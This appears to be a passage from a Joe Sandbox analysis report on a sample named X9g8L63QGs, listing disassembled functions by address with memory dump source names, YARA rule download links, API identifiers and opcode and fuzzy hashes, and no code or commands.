                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: TMP
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                                    • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                                                    • Instruction ID: 1f3bb686ad016479f005182e976b734015af3b2fec2391572f8e3e108b66157e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA51AF01F1864281FA64BE2A690517AD2926F84FA4FD84135DE8D67FD2EFBCE841D331
                                                                                                                                                                                                                                                                    Function 00007FF7C26834F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                                                    • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                                                    • Instruction ID: 7d75a20b5839b5ed1ec0eb6573543cc9f70e8a0c263ae2def4ff9824eb7e6965
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99B09220E07A42C2EA483F216CD222862A6BF48720FD80138C08CA1730DE6C20F6D731
                                                                                                                                                                                                                                                                    Function 00007FF7C2673610 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                                    • Instruction ID: ea9cefe46bc0e6e55c52b789e7a541cfa6c101bcdad13037bc8083d2049923d6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FED1ED62A0864285E728BE25A05027DA3A2FF45F68F944235CD8D27F94DFBDD4E1C770
                                                                                                                                                                                                                                                                    Function 00007FF7C2669870 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                                    • Instruction ID: c8ba1d80044e538955e031d33335f0db7859189e2c684a5c9cc589dc724fcc13
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DC17E762181E08BD289EB29E46947A73E1F78930DBD5406BEF8747BC5CB3CA514DB20
                                                                                                                                                                                                                                                                    Function 00007FF7C2672C80 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                                    • Instruction ID: 3a16abfd66b23a14759b55191d016db9a1dc3f5558686d518cbf6d00e0ada24f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAB1BE7290878185E764AF39E05023CBBA2E749F68FA44136CB8D67B95CFB9D481C770
                                                                                                                                                                                                                                                                    Function 00007FF7C267E5E0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                                                    • Instruction ID: 263a0dfd98e0d6dd6340469046f230dec079d0654fddf61431a0ad7f88981e52
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA81D372A0878146E774FF19A44037AAA92FB45BA4F944235DACD53F99DF7CD404CB20
                                                                                                                                                                                                                                                                    Function 00007FF7C2686488 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                                                    • Instruction ID: 8d8bd969dcd2cf3256bdba054634b27ed09a0ca92cd0dfc44671d3ac4dace0de
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A861F522E0C29286F764AE28945463DE6C2AF40774FA50239D79D66FD4DEEDE840C732
                                                                                                                                                                                                                                                                    Function 00007FF7C26721D4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                    • Instruction ID: 426172d2f474b894824707cddb41c51c367a285f5d960804c288c3d91b7dd66c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8516572A1865186E724AF29E08023873A2EB54F78F644131CEDD67BD4CF7AE843C760
                                                                                                                                                                                                                                                                    Function 00007FF7C26719B4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                    • Instruction ID: 388ba2b029977c870600f19a5fe41a3321c9af4746bb6b4d27a55f1b94cf512d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7516636A1465186E724AF2DE0402387362EB44F78F644172CACD67B94DB7AE843C770
                                                                                                                                                                                                                                                                    Function 00007FF7C2671DC4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                    • Instruction ID: 4c30e29213f99a15cb40839f3da725f714fea962e2418835500f1e8dbaf8f85a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84518C36A1465285E724AF2DE04023877A2EB44F78F644172DECD27B94CBB9E843C7A0
                                                                                                                                                                                                                                                                    Function 00007FF7C2671BC0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                                    • Instruction ID: e8f19f72f06d1ce7effd6d77ed4e74598d4b7422c175899c9ead71cdd42e1610
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28519636A18651C5E724AF2DE04023867A2EB45F68FA44172CE8D27B94CF7EE843D770
                                                                                                                                                                                                                                                                    Function 00007FF7C2671FD0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                                    • Instruction ID: 10a30073f4d182076d75434423e0387c8b64d6f416e3e7b0f123b1beb6d77462
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC519936A1869185E724AF29E44023877A2FB55F68F644131CF8D27B98CF7AEC42C770
                                                                                                                                                                                                                                                                    Function 00007FF7C26717B0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                                    • Instruction ID: 24c29f6969e8fcc736a565e5149d9df4161a7ed3c38ee2e3367cfb93ad7c9a51
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B518736A1865185E724AF2DE05023CA7A2EB44F68F645172CECD67B94CF7AE843C770
                                                                                                                                                                                                                                                                    Function 00007FF7C2675DA0 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                    • Instruction ID: 005ea874bbb6d9311b5f20e8b3996d334d470c61b55fb5ee007b5dd3aee00e84
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2241C66280978A44F965BD3819046B8E682DF22FB0DD812F0DDD973BD2DF8C2986C171
                                                                                                                                                                                                                                                                    Function 00007FF7C2679F10 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
